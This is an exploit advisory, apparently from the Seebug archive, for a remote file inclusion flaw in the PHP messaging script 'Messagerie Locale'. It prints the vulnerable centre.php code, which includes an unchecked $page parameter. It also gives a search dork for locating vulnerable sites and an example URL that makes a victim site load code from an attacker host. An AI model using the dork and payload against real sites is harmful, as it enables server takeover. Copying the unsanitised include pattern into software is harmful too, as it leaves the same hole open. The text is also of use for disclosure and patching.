#===================================================================================# # # Messagerie Locale => (centre.php) $page Remote File Inclusion Exploit # #===================================================================================# # # Softname : Messagerie Locale # Url : http://dvmet.free.fr/script/messagerie.zip # Dork : inurl:indexmess.php # Exploit type : Remote File Inclusion. # Critical: Dangerous. # Solution Status: Unpatched. # #===================================================================================# # # By DaDIsS - Member of the Moroccan Hackers Team # #===================================================================================# # # Exploit Explanation : # # # The flaw resides in centre.php file that contain this code : # # <? # if(isset($_GET['page'])) # { # $page=$_GET['page']; # } # else # { # $page=""; # } # # if (empty($page)||!isset($page)) # { # include("accueil.php"); # } # else # { # include($page.".php"); # } # # ?> # #===================================================================================# # # Example : # # # http://www.victime.com/(path)/centre.php?page=http://attacker # # #================================================================# # # Greetz : YouYouCool, Hacker1, and all Moroccan Hackers Team, viva Morocco guyz !! # #===================================================================================# # # DaDIsS / dadiss@virtuaplanet.net # Proud to be a Moroccan ! # #===================================================================================#
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论